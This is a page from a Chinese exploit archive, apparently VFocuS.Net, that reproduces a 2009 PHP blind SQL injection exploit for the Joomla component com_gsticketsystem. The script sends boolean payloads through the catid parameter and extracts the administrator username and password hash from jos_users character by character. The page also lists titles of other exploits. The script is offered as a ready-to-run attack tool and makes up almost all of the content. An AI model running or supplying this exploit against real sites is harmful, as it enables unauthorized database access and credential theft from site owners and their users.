首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Joomla com_gsticketsystem (catid) Blind SQL Injection Exploit
来源:cyb3r-1st [at] hormail.com 作者:Cyb3R-1sT 发布时间:2009-05-20  
<?php
ini_set("max_execution_time",0);
print_r('
##############################################################################
#
#         Joomla com_gsticketsystem (catid) Blind SQL Injection Exploit
#
#                             ===  Cyb3R-1sT  ===
#                        cyb3r-1st [at] hormail.com
#                               inject0r5 t3am
#
#                                  : Usage :
# php file.php "http://site/index.php?option=com_gsticketsystem&controller=entrypoint&task=viewCategory&catid=2"
#
#                                : Sp.GrEetZ :
#       [ All friends ] & [ 7rs.org ] & [ tryag.com] & [ sec-code.com ]
#
##############################################################################
');
if ($argc > 1) {
$url = $argv[1];
$r = strlen(file_get_contents($url."+and+1=1--"));
echo "\nExploiting:\n";
$w = strlen(file_get_contents($url."+and+1=0--"));
$t = abs((100-($w/$r*100)));
echo "Username: ";
for ($i=1; $i <= 30; $i++) {
$laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
      $count = $i;
      $i = 30;
   }
}
for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 122;
      }
   }
}
echo "\nPassword: ";
for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
      if ($i == 60) {
         $i = 98;
      }
      $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
      if (abs((100-($laenge/$r*100))) > $t-1) {
         $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
         if (abs((100-($laenge/$r*100))) > $t-1) {
            echo chr($i-1);
         } else {
            echo chr($i);
         }
         $i = 102;
      }
   }
}
}
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·httpdx <= 0.5b FTP Server (CWD
·PHP Article Publisher Remote C
·AOL IWinAmpActiveX Class Conve
·Jieqi CMS <= 1.5 Remote Code E
·Coppermine Photo Gallery <= 1.
·freebsd/x86-64 exec("/bin/sh")
·Dog Pedigree Online Database 1
·Mereo 1.8.0 (Get Request) Remo
·KingSoft Web Shield <= 1.1.0.6
·Zervit Webserver 0.04 (GET Req
·Joomla Casino 0.3.1 Multiple S
·OpenSSL <= 0.9.8k, 1.0.0-beta2
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved